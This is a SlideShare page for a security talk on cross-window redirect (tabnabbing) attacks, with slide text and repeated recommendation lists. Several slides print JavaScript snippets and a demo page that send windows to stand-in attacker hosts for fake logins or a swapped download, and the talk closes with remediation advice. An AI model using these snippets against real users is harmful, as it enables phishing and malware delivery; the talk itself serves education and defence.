SlideShare a Scribd company logo

The Cross Window redirect

Download as PPTX, PDF
Michael Hendrickx
Michael Hendrickx

This document summarizes cross-window redirects, a social engineering technique that exploits opened browser windows using JavaScript. It discusses two variants: child window redirects, where the opened child window redirects the parent, and parent window redirects, where the opened parent window is redirected by the child. It provides examples of how this technique can be used maliciously to redirect users to phishing pages from legitimate sites. The document recommends ways to mitigate this risk, such as not using window.open() to open links and verifying the window opener is trusted.

Technology
1 of 16
Cross Window Redirect Khaled Hawasli Michael Hendrickx
Who are we? • Khaled Hawasli – Manager Security Analysis @ HelpAG • Michael Hendrickx – Security Analyst @ HelpAG
Preface • Social Engineering becomes more sophisticated • People don’t fall for the “click here” trick – Receive email with link – Click link – Presented with login screen
Old tricks • www.facebook.com
Cross-Window Redirect • Exploiting opened windows using JS • Unknowingly hyperlink redirections • Works on all browsers • 2 Variants: – Child window redirect – Parent window redirect
Child window redirect • Control the link you just opened Opens Gmail with window.open() Redirect to fake phishing page Parent Window The attackers site (controlling window) Child Window The targeted site (controlled window) childWindow = window.open(‘https://mail.google.com’); childWindow.location = ‘http://mail.google.com.evil.com/gmail/login.php’; 1 2
X-windows redirect demo • Let’s get malware to users – Let’s watch a movie – We need a movie player http://michaelhendrickx.com/misc/sf.html
X-windows redirect explained • Link to SF to download software – Rewrite the link before the countdown  sf = window.open(‘http://sourceforge.net/...’); setTimeout(function(){ sf.location = ‘http://evil.org/nmap.tar.gz’; }, 4000);
Multiple ways to attack this: • setTimeout(): – Wait for a while and redirect the page. • Interactive(): – Server polling using XHR – Attacker can flip page on demand • HTML5 Visibility API: – Flip page when user is not looking https://github.com/ndrix/xwindow-redirect
Parent Window Redirect • “Evil child” can control the parent 1 Opens website with window.open() Child redirects the parent Parent Window The targeted site (controlled window) Child Window The (co window.open(‘http://mywebsite.com’); window.opener = ‘http://evil.com/gmail/login.php’;
Parent window redirect: demo • Emirates has some crazy deals! (Click Facebook message)
Parent window redirect: demo • Emirates has some crazy deals! <!DOCTYPE html> <head><title>Crazy deals from Emirates.com</title></head> <body> <img src="ek.jpg"/> <script> window.opener.location = 'http://fakefacebook.com’; window.location = 'http://www.emirates.com/ae/…'; </script> </body> </html>
Parent window redirect: demo • User may spend long enough on the target site, believing that Facebook timed out. Parent Window Child Window1. open child with window.open() 2. Redirect facebook to fake “session logged out” 3. refresh itself to legitimate site
Other sites that use window.open() • Facebook, Amazon widget, … • GMail schema.org
Remediation • Don’t use window.open() to open hyperlinks – Those links may control your page • Verify if your page was opened from another page – if(window.opener && !window.opener.closed){ ... } • Preferably, browsers should use X-Frame- Options header for these JS links
Thank you! Any questions?

Recommended

Zero To WordPress Plubish
Zero To WordPress PlubishZero To WordPress Plubish
Zero To WordPress Plubish
Michele Butcher-Jones
 
How to hack the web
How to hack the webHow to hack the web
How to hack the web
Amy McMullin
 
ECrime presentation - A few bits about malware
ECrime presentation - A few bits about malwareECrime presentation - A few bits about malware
ECrime presentation - A few bits about malware
Michael Hendrickx
 
Social Engineering Trickx - Owasp Doha 2015
Social Engineering Trickx - Owasp Doha 2015Social Engineering Trickx - Owasp Doha 2015
Social Engineering Trickx - Owasp Doha 2015
Michael Hendrickx
 
Owasp Top 10 A1: Injection
Owasp Top 10 A1: InjectionOwasp Top 10 A1: Injection
Owasp Top 10 A1: Injection
Michael Hendrickx
 
Secure Code Review 101
Secure Code Review 101Secure Code Review 101
Secure Code Review 101
Narudom Roongsiriwong, CISSP
 
Securing the Internet from Cyber Criminals
Securing the Internet from Cyber CriminalsSecuring the Internet from Cyber Criminals
Securing the Internet from Cyber Criminals
Narudom Roongsiriwong, CISSP
 
Owasp Top 10 A3: Cross Site Scripting (XSS)
Owasp Top 10 A3: Cross Site Scripting (XSS)Owasp Top 10 A3: Cross Site Scripting (XSS)
Owasp Top 10 A3: Cross Site Scripting (XSS)
Michael Hendrickx
 

Recommended

Zero To WordPress Plubish
Zero To WordPress PlubishZero To WordPress Plubish
Zero To WordPress Plubish
Michele Butcher-Jones
 
How to hack the web
How to hack the webHow to hack the web
How to hack the web
Amy McMullin
 
ECrime presentation - A few bits about malware
ECrime presentation - A few bits about malwareECrime presentation - A few bits about malware
ECrime presentation - A few bits about malware
Michael Hendrickx
 
Social Engineering Trickx - Owasp Doha 2015
Social Engineering Trickx - Owasp Doha 2015Social Engineering Trickx - Owasp Doha 2015
Social Engineering Trickx - Owasp Doha 2015
Michael Hendrickx
 
Owasp Top 10 A1: Injection
Owasp Top 10 A1: InjectionOwasp Top 10 A1: Injection
Owasp Top 10 A1: Injection
Michael Hendrickx
 
Secure Code Review 101
Secure Code Review 101Secure Code Review 101
Secure Code Review 101
Narudom Roongsiriwong, CISSP
 
Securing the Internet from Cyber Criminals
Securing the Internet from Cyber CriminalsSecuring the Internet from Cyber Criminals
Securing the Internet from Cyber Criminals
Narudom Roongsiriwong, CISSP
 
Owasp Top 10 A3: Cross Site Scripting (XSS)
Owasp Top 10 A3: Cross Site Scripting (XSS)Owasp Top 10 A3: Cross Site Scripting (XSS)
Owasp Top 10 A3: Cross Site Scripting (XSS)
Michael Hendrickx
 
Introduction to jQuery Mobile
Introduction to jQuery MobileIntroduction to jQuery Mobile
Introduction to jQuery Mobile
David Hudson
 
Web app with j query &amp; javascript (5:4)
Web app with j query &amp; javascript (5:4)Web app with j query &amp; javascript (5:4)
Web app with j query &amp; javascript (5:4)
Thinkful
 
Going Beyond Cross Domain Boundaries (jQuery Bulgaria)
Going Beyond Cross Domain Boundaries (jQuery Bulgaria)Going Beyond Cross Domain Boundaries (jQuery Bulgaria)
Going Beyond Cross Domain Boundaries (jQuery Bulgaria)
Ivo Andreev
 
Html5: something wicked this way comes
Html5: something wicked this way comesHtml5: something wicked this way comes
Html5: something wicked this way comes
Krzysztof Kotowicz
 
Web works hol
Web works holWeb works hol
Web works holmomoahmedabad
 
Responsive websites. Toolbox
Responsive websites. ToolboxResponsive websites. Toolbox
Responsive websites. Toolbox
Wojtek Zając
 
02-browser-sec-model-sop.pptx
02-browser-sec-model-sop.pptx02-browser-sec-model-sop.pptx
02-browser-sec-model-sop.pptx
ssuserec53e73
 
8 Most Popular Joomla Hacks & How To Avoid Them
8 Most Popular Joomla Hacks & How To Avoid Them8 Most Popular Joomla Hacks & How To Avoid Them
8 Most Popular Joomla Hacks & How To Avoid Them
SiteGround.com
 
Selenium WebDriver
Selenium WebDriverSelenium WebDriver
Selenium WebDriver
Rajathi-QA
 
Cos 432 web_security
Cos 432 web_securityCos 432 web_security
Cos 432 web_securityMichael Freyberger
 
WordPress Security
WordPress SecurityWordPress Security
WordPress Security
Ivan Storck
 
Build a Web App with JavaScript and jQuery (5:18:17, Los Angeles)
Build a Web App with JavaScript and jQuery (5:18:17, Los Angeles)Build a Web App with JavaScript and jQuery (5:18:17, Los Angeles)
Build a Web App with JavaScript and jQuery (5:18:17, Los Angeles)
Thinkful
 
8 Most Common Joomla! Hacks and How to Avoid Them
8 Most Common Joomla! Hacks and How to Avoid Them8 Most Common Joomla! Hacks and How to Avoid Them
8 Most Common Joomla! Hacks and How to Avoid Them
Daniel Kanchev
 
Nishimura finding vulnerabilities-in-firefox-for-i-os-(nishimunea)
Nishimura finding vulnerabilities-in-firefox-for-i-os-(nishimunea)Nishimura finding vulnerabilities-in-firefox-for-i-os-(nishimunea)
Nishimura finding vulnerabilities-in-firefox-for-i-os-(nishimunea)
PacSecJP
 
15_526_topic11 for topics for students.ppt
15_526_topic11 for topics for students.ppt15_526_topic11 for topics for students.ppt
15_526_topic11 for topics for students.ppt
shatrutrial44
 
Neo word press meetup ehermits - how to keep your blog from being hacked 2012
Neo word press meetup ehermits - how to keep your blog from being hacked 2012Neo word press meetup ehermits - how to keep your blog from being hacked 2012
Neo word press meetup ehermits - how to keep your blog from being hacked 2012Brian Layman
 
External JavaScript Widget Development Best Practices (updated) (v.1.1)
External JavaScript Widget Development Best Practices (updated) (v.1.1) External JavaScript Widget Development Best Practices (updated) (v.1.1)
External JavaScript Widget Development Best Practices (updated) (v.1.1)
Volkan Özçelik
 
Chapter 13 web security
Chapter 13 web securityChapter 13 web security
Chapter 13 web security
newbie2019
 
Rich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeRich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeJeremiah Grossman
 
Antisnatchor all you ever wanted to know about beef
Antisnatchor all you ever wanted to know about beefAntisnatchor all you ever wanted to know about beef
Antisnatchor all you ever wanted to know about beefDefconRussia
 
Communications Mining Series - Zero to Hero - Session 1
Communications Mining Series - Zero to Hero - Session 1Communications Mining Series - Zero to Hero - Session 1
Communications Mining Series - Zero to Hero - Session 1
DianaGray10
 
UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4
DianaGray10
 

More Related Content

Similar to The Cross Window redirect

Introduction to jQuery Mobile
Introduction to jQuery MobileIntroduction to jQuery Mobile
Introduction to jQuery Mobile
David Hudson
 
Web app with j query &amp; javascript (5:4)
Web app with j query &amp; javascript (5:4)Web app with j query &amp; javascript (5:4)
Web app with j query &amp; javascript (5:4)
Thinkful
 
Going Beyond Cross Domain Boundaries (jQuery Bulgaria)
Going Beyond Cross Domain Boundaries (jQuery Bulgaria)Going Beyond Cross Domain Boundaries (jQuery Bulgaria)
Going Beyond Cross Domain Boundaries (jQuery Bulgaria)
Ivo Andreev
 
Html5: something wicked this way comes
Html5: something wicked this way comesHtml5: something wicked this way comes
Html5: something wicked this way comes
Krzysztof Kotowicz
 
Responsive websites. Toolbox
Responsive websites. ToolboxResponsive websites. Toolbox
Responsive websites. Toolbox
Wojtek Zając
 
02-browser-sec-model-sop.pptx
02-browser-sec-model-sop.pptx02-browser-sec-model-sop.pptx
02-browser-sec-model-sop.pptx
ssuserec53e73
 
8 Most Popular Joomla Hacks & How To Avoid Them
8 Most Popular Joomla Hacks & How To Avoid Them8 Most Popular Joomla Hacks & How To Avoid Them
8 Most Popular Joomla Hacks & How To Avoid Them
SiteGround.com
 
Selenium WebDriver
Selenium WebDriverSelenium WebDriver
Selenium WebDriver
Rajathi-QA
 
WordPress Security
WordPress SecurityWordPress Security
WordPress Security
Ivan Storck
 
Build a Web App with JavaScript and jQuery (5:18:17, Los Angeles)
Build a Web App with JavaScript and jQuery (5:18:17, Los Angeles)Build a Web App with JavaScript and jQuery (5:18:17, Los Angeles)
Build a Web App with JavaScript and jQuery (5:18:17, Los Angeles)
Thinkful
 
8 Most Common Joomla! Hacks and How to Avoid Them
8 Most Common Joomla! Hacks and How to Avoid Them8 Most Common Joomla! Hacks and How to Avoid Them
8 Most Common Joomla! Hacks and How to Avoid Them
Daniel Kanchev
 
Nishimura finding vulnerabilities-in-firefox-for-i-os-(nishimunea)
Nishimura finding vulnerabilities-in-firefox-for-i-os-(nishimunea)Nishimura finding vulnerabilities-in-firefox-for-i-os-(nishimunea)
Nishimura finding vulnerabilities-in-firefox-for-i-os-(nishimunea)
PacSecJP
 
15_526_topic11 for topics for students.ppt
15_526_topic11 for topics for students.ppt15_526_topic11 for topics for students.ppt
15_526_topic11 for topics for students.ppt
shatrutrial44
 
Neo word press meetup ehermits - how to keep your blog from being hacked 2012
Neo word press meetup ehermits - how to keep your blog from being hacked 2012Neo word press meetup ehermits - how to keep your blog from being hacked 2012
Neo word press meetup ehermits - how to keep your blog from being hacked 2012Brian Layman
 
External JavaScript Widget Development Best Practices (updated) (v.1.1)
External JavaScript Widget Development Best Practices (updated) (v.1.1) External JavaScript Widget Development Best Practices (updated) (v.1.1)
External JavaScript Widget Development Best Practices (updated) (v.1.1)
Volkan Özçelik
 
Chapter 13 web security
Chapter 13 web securityChapter 13 web security
Chapter 13 web security
newbie2019
 
Rich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeRich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeJeremiah Grossman
 
Antisnatchor all you ever wanted to know about beef
Antisnatchor all you ever wanted to know about beefAntisnatchor all you ever wanted to know about beef
Antisnatchor all you ever wanted to know about beefDefconRussia
 

Similar to The Cross Window redirect (20)

Introduction to jQuery Mobile
Introduction to jQuery MobileIntroduction to jQuery Mobile
Introduction to jQuery Mobile
 
Web app with j query &amp; javascript (5:4)
Web app with j query &amp; javascript (5:4)Web app with j query &amp; javascript (5:4)
Web app with j query &amp; javascript (5:4)
 
Going Beyond Cross Domain Boundaries (jQuery Bulgaria)
Going Beyond Cross Domain Boundaries (jQuery Bulgaria)Going Beyond Cross Domain Boundaries (jQuery Bulgaria)
Going Beyond Cross Domain Boundaries (jQuery Bulgaria)
 
Html5: something wicked this way comes
Html5: something wicked this way comesHtml5: something wicked this way comes
Html5: something wicked this way comes
 
Web works hol
Web works holWeb works hol
Web works hol
 
Responsive websites. Toolbox
Responsive websites. ToolboxResponsive websites. Toolbox
Responsive websites. Toolbox
 
02-browser-sec-model-sop.pptx
02-browser-sec-model-sop.pptx02-browser-sec-model-sop.pptx
02-browser-sec-model-sop.pptx
 
8 Most Popular Joomla Hacks & How To Avoid Them
8 Most Popular Joomla Hacks & How To Avoid Them8 Most Popular Joomla Hacks & How To Avoid Them
8 Most Popular Joomla Hacks & How To Avoid Them
 
Selenium WebDriver
Selenium WebDriverSelenium WebDriver
Selenium WebDriver
 
Cos 432 web_security
Cos 432 web_securityCos 432 web_security
Cos 432 web_security
 
WordPress Security
WordPress SecurityWordPress Security
WordPress Security
 
Build a Web App with JavaScript and jQuery (5:18:17, Los Angeles)
Build a Web App with JavaScript and jQuery (5:18:17, Los Angeles)Build a Web App with JavaScript and jQuery (5:18:17, Los Angeles)
Build a Web App with JavaScript and jQuery (5:18:17, Los Angeles)
 
8 Most Common Joomla! Hacks and How to Avoid Them
8 Most Common Joomla! Hacks and How to Avoid Them8 Most Common Joomla! Hacks and How to Avoid Them
8 Most Common Joomla! Hacks and How to Avoid Them
 
Nishimura finding vulnerabilities-in-firefox-for-i-os-(nishimunea)
Nishimura finding vulnerabilities-in-firefox-for-i-os-(nishimunea)Nishimura finding vulnerabilities-in-firefox-for-i-os-(nishimunea)
Nishimura finding vulnerabilities-in-firefox-for-i-os-(nishimunea)
 
15_526_topic11 for topics for students.ppt
15_526_topic11 for topics for students.ppt15_526_topic11 for topics for students.ppt
15_526_topic11 for topics for students.ppt
 
Neo word press meetup ehermits - how to keep your blog from being hacked 2012
Neo word press meetup ehermits - how to keep your blog from being hacked 2012Neo word press meetup ehermits - how to keep your blog from being hacked 2012
Neo word press meetup ehermits - how to keep your blog from being hacked 2012
 
External JavaScript Widget Development Best Practices (updated) (v.1.1)
External JavaScript Widget Development Best Practices (updated) (v.1.1) External JavaScript Widget Development Best Practices (updated) (v.1.1)
External JavaScript Widget Development Best Practices (updated) (v.1.1)
 
Chapter 13 web security
Chapter 13 web securityChapter 13 web security
Chapter 13 web security
 
Rich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeRich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safe
 
Antisnatchor all you ever wanted to know about beef
Antisnatchor all you ever wanted to know about beefAntisnatchor all you ever wanted to know about beef
Antisnatchor all you ever wanted to know about beef
 

Recently uploaded

Communications Mining Series - Zero to Hero - Session 1
Communications Mining Series - Zero to Hero - Session 1Communications Mining Series - Zero to Hero - Session 1
Communications Mining Series - Zero to Hero - Session 1
DianaGray10
 
UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4
DianaGray10
 
A tale of scale & speed: How the US Navy is enabling software delivery from l...
A tale of scale & speed: How the US Navy is enabling software delivery from l...A tale of scale & speed: How the US Navy is enabling software delivery from l...
A tale of scale & speed: How the US Navy is enabling software delivery from l...
sonjaschweigert1
 
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 previewState of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
Prayukth K V
 
GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...
GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...
GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...
Neo4j
 
Epistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI supportEpistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI support
Alan Dix
 
Observability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdf
Observability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdfObservability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdf
Observability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdf
Paige Cruz
 
PHP Frameworks: I want to break free (IPC Berlin 2024)
PHP Frameworks: I want to break free (IPC Berlin 2024)PHP Frameworks: I want to break free (IPC Berlin 2024)
PHP Frameworks: I want to break free (IPC Berlin 2024)
Ralf Eggert
 
Elevating Tactical DDD Patterns Through Object Calisthenics
Elevating Tactical DDD Patterns Through Object CalisthenicsElevating Tactical DDD Patterns Through Object Calisthenics
Elevating Tactical DDD Patterns Through Object Calisthenics
Dorra BARTAGUIZ
 
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
DanBrown980551
 
Uni Systems Copilot event_05062024_C.Vlachos.pdf
Uni Systems Copilot event_05062024_C.Vlachos.pdfUni Systems Copilot event_05062024_C.Vlachos.pdf
Uni Systems Copilot event_05062024_C.Vlachos.pdf
Uni Systems S.M.S.A.
 
GridMate - End to end testing is a critical piece to ensure quality and avoid...
GridMate - End to end testing is a critical piece to ensure quality and avoid...GridMate - End to end testing is a critical piece to ensure quality and avoid...
GridMate - End to end testing is a critical piece to ensure quality and avoid...
ThomasParaiso2
 
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Albert Hoitingh
 
Securing your Kubernetes cluster_ a step-by-step guide to success !
Securing your Kubernetes cluster_ a step-by-step guide to success !Securing your Kubernetes cluster_ a step-by-step guide to success !
Securing your Kubernetes cluster_ a step-by-step guide to success !
KatiaHIMEUR1
 
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdfSmart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
91mobiles
 
20240605 QFM017 Machine Intelligence Reading List May 2024
20240605 QFM017 Machine Intelligence Reading List May 202420240605 QFM017 Machine Intelligence Reading List May 2024
20240605 QFM017 Machine Intelligence Reading List May 2024
Matthew Sinclair
 
By Design, not by Accident - Agile Venture Bolzano 2024
By Design, not by Accident - Agile Venture Bolzano 2024By Design, not by Accident - Agile Venture Bolzano 2024
By Design, not by Accident - Agile Venture Bolzano 2024
Pierluigi Pugliese
 
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
SOFTTECHHUB
 
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdfFIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance
 
PCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase TeamPCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase Team
ControlCase
 

Recently uploaded (20)

Communications Mining Series - Zero to Hero - Session 1
Communications Mining Series - Zero to Hero - Session 1Communications Mining Series - Zero to Hero - Session 1
Communications Mining Series - Zero to Hero - Session 1
 
UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4
 
A tale of scale & speed: How the US Navy is enabling software delivery from l...
A tale of scale & speed: How the US Navy is enabling software delivery from l...A tale of scale & speed: How the US Navy is enabling software delivery from l...
A tale of scale & speed: How the US Navy is enabling software delivery from l...
 
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 previewState of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
 
GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...
GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...
GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...
 
Epistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI supportEpistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI support
 
Observability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdf
Observability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdfObservability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdf
Observability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdf
 
PHP Frameworks: I want to break free (IPC Berlin 2024)
PHP Frameworks: I want to break free (IPC Berlin 2024)PHP Frameworks: I want to break free (IPC Berlin 2024)
PHP Frameworks: I want to break free (IPC Berlin 2024)
 
Elevating Tactical DDD Patterns Through Object Calisthenics
Elevating Tactical DDD Patterns Through Object CalisthenicsElevating Tactical DDD Patterns Through Object Calisthenics
Elevating Tactical DDD Patterns Through Object Calisthenics
 
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
 
Uni Systems Copilot event_05062024_C.Vlachos.pdf
Uni Systems Copilot event_05062024_C.Vlachos.pdfUni Systems Copilot event_05062024_C.Vlachos.pdf
Uni Systems Copilot event_05062024_C.Vlachos.pdf
 
GridMate - End to end testing is a critical piece to ensure quality and avoid...
GridMate - End to end testing is a critical piece to ensure quality and avoid...GridMate - End to end testing is a critical piece to ensure quality and avoid...
GridMate - End to end testing is a critical piece to ensure quality and avoid...
 
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
 
Securing your Kubernetes cluster_ a step-by-step guide to success !
Securing your Kubernetes cluster_ a step-by-step guide to success !Securing your Kubernetes cluster_ a step-by-step guide to success !
Securing your Kubernetes cluster_ a step-by-step guide to success !
 
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdfSmart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
 
20240605 QFM017 Machine Intelligence Reading List May 2024
20240605 QFM017 Machine Intelligence Reading List May 202420240605 QFM017 Machine Intelligence Reading List May 2024
20240605 QFM017 Machine Intelligence Reading List May 2024
 
By Design, not by Accident - Agile Venture Bolzano 2024
By Design, not by Accident - Agile Venture Bolzano 2024By Design, not by Accident - Agile Venture Bolzano 2024
By Design, not by Accident - Agile Venture Bolzano 2024
 
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
 
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdfFIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
 
PCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase TeamPCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase Team
 

The Cross Window redirect

  • 1. Cross Window Redirect Khaled Hawasli Michael Hendrickx
  • 2. Who are we? • Khaled Hawasli – Manager Security Analysis @ HelpAG • Michael Hendrickx – Security Analyst @ HelpAG
  • 3. Preface • Social Engineering becomes more sophisticated • People don’t fall for the “click here” trick – Receive email with link – Click link – Presented with login screen
  • 5. Cross-Window Redirect • Exploiting opened windows using JS • Unknowingly hyperlink redirections • Works on all browsers • 2 Variants: – Child window redirect – Parent window redirect
  • 6. Child window redirect • Control the link you just opened Opens Gmail with window.open() Redirect to fake phishing page Parent Window The attackers site (controlling window) Child Window The targeted site (controlled window) childWindow = window.open(‘https://mail.google.com’); childWindow.location = ‘http://mail.google.com.evil.com/gmail/login.php’; 1 2
  • 7. X-windows redirect demo • Let’s get malware to users – Let’s watch a movie – We need a movie player http://michaelhendrickx.com/misc/sf.html
  • 8. X-windows redirect explained • Link to SF to download software – Rewrite the link before the countdown  sf = window.open(‘http://sourceforge.net/...’); setTimeout(function(){ sf.location = ‘http://evil.org/nmap.tar.gz’; }, 4000);
  • 9. Multiple ways to attack this: • setTimeout(): – Wait for a while and redirect the page. • Interactive(): – Server polling using XHR – Attacker can flip page on demand • HTML5 Visibility API: – Flip page when user is not looking https://github.com/ndrix/xwindow-redirect
  • 10. Parent Window Redirect • “Evil child” can control the parent 1 Opens website with window.open() Child redirects the parent Parent Window The targeted site (controlled window) Child Window The (co window.open(‘http://mywebsite.com’); window.opener = ‘http://evil.com/gmail/login.php’;
  • 11. Parent window redirect: demo • Emirates has some crazy deals! (Click Facebook message)
  • 12. Parent window redirect: demo • Emirates has some crazy deals! <!DOCTYPE html> <head><title>Crazy deals from Emirates.com</title></head> <body> <img src="ek.jpg"/> <script> window.opener.location = 'http://fakefacebook.com’; window.location = 'http://www.emirates.com/ae/…'; </script> </body> </html>
  • 13. Parent window redirect: demo • User may spend long enough on the target site, believing that Facebook timed out. Parent Window Child Window1. open child with window.open() 2. Redirect facebook to fake “session logged out” 3. refresh itself to legitimate site
  • 14. Other sites that use window.open() • Facebook, Amazon widget, … • GMail schema.org
  • 15. Remediation • Don’t use window.open() to open hyperlinks – Those links may control your page • Verify if your page was opened from another page – if(window.opener && !window.opener.closed){ ... } • Preferably, browsers should use X-Frame- Options header for these JS links